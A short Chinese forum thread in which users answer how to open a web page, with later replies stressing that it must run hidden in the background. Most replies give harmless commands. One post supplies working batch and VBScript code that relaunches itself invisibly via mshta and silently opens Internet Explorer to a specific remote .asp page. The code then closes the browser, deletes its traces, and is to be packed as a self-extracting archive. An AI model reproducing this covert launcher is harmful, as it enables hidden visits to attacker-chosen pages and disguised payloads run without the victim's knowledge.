能力值:
( LV3,RANK:30 )
|
-
-
2 楼
start http://www.163.com
|
能力值:
( LV13,RANK:1050 )
|
-
-
3 楼
同意StarsunYzL答案
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
那是显示的..
我用的这个方法
3.bat代码
@echo off
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
@echo off
echo set ierunner=createobject("wscript.shell") > ie.vbs
echo ierunner.run "cmd /c start /min iexplore -nohome http://lxx666.cn/im/i.asp",0 >>ie.vbs
echo wscript.sleep 0800 >> ie.vbs
echo ierunner.sendkeys "%%{F4}" >> ie.vbs
cscript //nologo ie.vbs
del ie.vbs
3.vbs代码
Set shell = Wscript.createobject("wscript.shell")
a = shell.run ("3.bat",0)
然后用rar做个自解压~
|
能力值:
( LV2,RANK:10 )
|
-
-
5 楼
直接用iexplorer打开
比如C:\Program Files\Internet Explorer\iexplore www.163.com
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
"start http://www.163.com"这个简单且有效。
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
同意楼上的观点,但好像不能隐藏吧
|
能力值:
( LV2,RANK:10 )
|
-
-
8 楼
晕,人家要的是后台运行
|
|
|